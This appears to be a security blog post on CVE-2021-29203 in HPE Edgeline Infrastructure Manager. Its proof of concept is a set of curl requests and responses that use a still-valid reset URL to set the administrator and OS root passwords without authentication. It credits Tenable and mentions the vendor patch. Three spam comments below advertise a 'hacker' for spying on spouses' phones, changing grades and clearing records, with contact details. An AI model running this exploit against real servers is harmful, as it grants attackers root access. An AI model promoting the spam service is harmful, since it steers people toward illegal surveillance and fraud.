top of page
  • FC

CVE-2021-29203 (HP Edgeline Manager) - Explained


CVE-2021-29203 is an interesting vulnerability that allows an attacker to take advantage of a security feature within HPE Edgeline Infrastructure Management software if you are running any version prior to version 1.22. When setting up the software for the first time the administrator is prompted to reset the default password. This is done by using the following URL:



However this url remains valid even after the password is reset. An unauthenticated attacker can then use the same URL to change the OS root account. This then allows the attacker to login via SSH into the host. Let's take a look at a proof of concept.


First we reset the Administrator password.


curl -k --tlsv1.2 -H 'Content-Type: application/json' -d '{"Password":"Cygenta"}' -X PATCH https://x.x.x.x/redfish/v1/SessionService/ResetPassword/1

{"Messages": [{"MessageID": "Base.1.0.Updated"}], "@odata.type": "#Message.1.0.0.Message", "error": {"@Message.ExtendedInfo": [{"MessageID": "Base.1.0.updated"}], "code": "iLO.1.0.ExtendedInfo"}}

Next we log in with the new password and get our X-Auth-Token.



curl -ki --tlsv1.2 -H 'content-type: application/json' -d '{"UserName":"Administrator","Password":"Cygenta"}' https://x.x.x.x/redfish/v1/SessionService/Sessions

HTTP/1.1 201 Created
Server: nginx
Date: Thu, 13 May 2021 23:17:04 GMT
Content-Type: application/json
Content-Length: 195
Connection: keep-alive
X-Auth-Token: efb3xxxxxxxxxxxx7f2b
Is-Ldap: False
PasswordReset: False
Location: https://x.x.x.x/redfish/v1/SessionService/Sessions/Administrator16
Cache-Control: no-cache
OData-Version: 4.0
Link: https://x.x.x.x/redfish/v1/SchemaStore/en/SessionCollection.json;rel=describedby
Vary: Accept
Allow: POST, OPTIONS, GET
X-Frame-Options: SAMEORIGIN
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

{"Messages": [{"MessageID": "Base.1.0.Created"}], "@odata.type": "#Message.1.0.0.Message", "error": {"@Message.ExtendedInfo": [{"MessageID": "Base.1.0.Created"}], "code": "iLO.1.0.ExtendedInfo"}}

Now we can reset both the OS root account and the web application account passwords.


curl -ki --tlsv1.2  -H 'content-type: application/json' -H 'x-auth-token: efb3xxxxxxxxxxxx7f2b' -d '{"Password":"Cygenta"}' -X PATCH https://x.x.x.x/redfish/v1/AccountService/Accounts/1

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 23:25:18 GMT
Content-Type: application/json
Content-Length: 75
Connection: keep-alive
Vary: Accept, Cookie
Allow: POST, GET, DELETE, OPTIONS, PATCH
X-Frame-Options: SAMEORIGIN
Set-Cookie: sessionid=3xrhw4xxxxxxxxxxxxxxxxxxxx; expires=Thu, 21 April 2021 23:25:18 GMT; HttpOnly; Max-Age=1209600; Path=/; SameSite=Lax
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

{"Status": "success", "Invalid_Entries": [], "Valid_Entries": ["Password"]}

This simple authentication bypass was discovered by the team at Tenable and more information can be found on the NIST website here


HP has already released a software patch for this vulnerability and recommend that it should be applied as soon as possible. For more information and to download the patch visit HP here.


393 views

Related Posts

See All

3 Comments


Jeffrey Glenn
Jeffrey Glenn
Oct 19, 2023

I appreciate Henry for making me realise the truth to a certified hacker who knows a lot about what he is doing. I strongly recommend you hire him because he’s the best out there and always delivers. I have referred over 10 people to him and all had positive results. He can help you hack into any devices, social networks including – Facebook, Hangout, iMessages, Twitter accounts, Snap chat , Instagram, Whatsapp, wechat, text messages ,smartphone cloning,tracking emails and also any other social media messenger or sites. It’s advisable to hire a professional hacker.Thank me later. Contact him here., Henryclarkethicalhacker@gmail.com and you can text, call and Whatsapp him on +1(201)4305865, or +1(219)7960574.....



Like

Agnes Lizzy
Agnes Lizzy
Oct 14, 2023

Contact him for any type of hacking, he is a professional hacker that specializes in exposing cheating spouses, and every other hacking related issues. he is a cyber guru, he helps catch cheating spouses by hacking their communications like call, Facebook, text, emails, Skype, whats-app and many more. I have used this service before and he did a very good job, he gave me every proof I needed to know that my fiancee was cheating. You can contact him on his email to help you catch your cheating spouse, or for any other hacking related problems, like hacking websites, bank statement, grades and many more. he will definitely help you, he has helped a lot of people, contact him on,…

Like

Janet Lucy
Janet Lucy
Oct 12, 2023

I’m excited to write about Henry Hacker, he is a great and brilliant hacker who penetrated my spouse’s phone without a physical installation app. And I was able to access my spouse’s phone, SMS, Whatsapp, Instagram, Facebook, Wechat, Snapchat, Call Logs, Kik, Twitter and all social media. The most amazing thing there is that he restores all phone deleted text messages. And I also have access to everything including the phone gallery without touching the phone.I can see the whole secret of my spouse. Contact him for any hacking service. He is also a genius in repairing Credit Score, increasing school grade, Clear Criminal Record etc. His service is fast. Contact:, Henryclarkethicalhacker@gmail.com and you can text, call him on whatsapp…


Like
bottom of page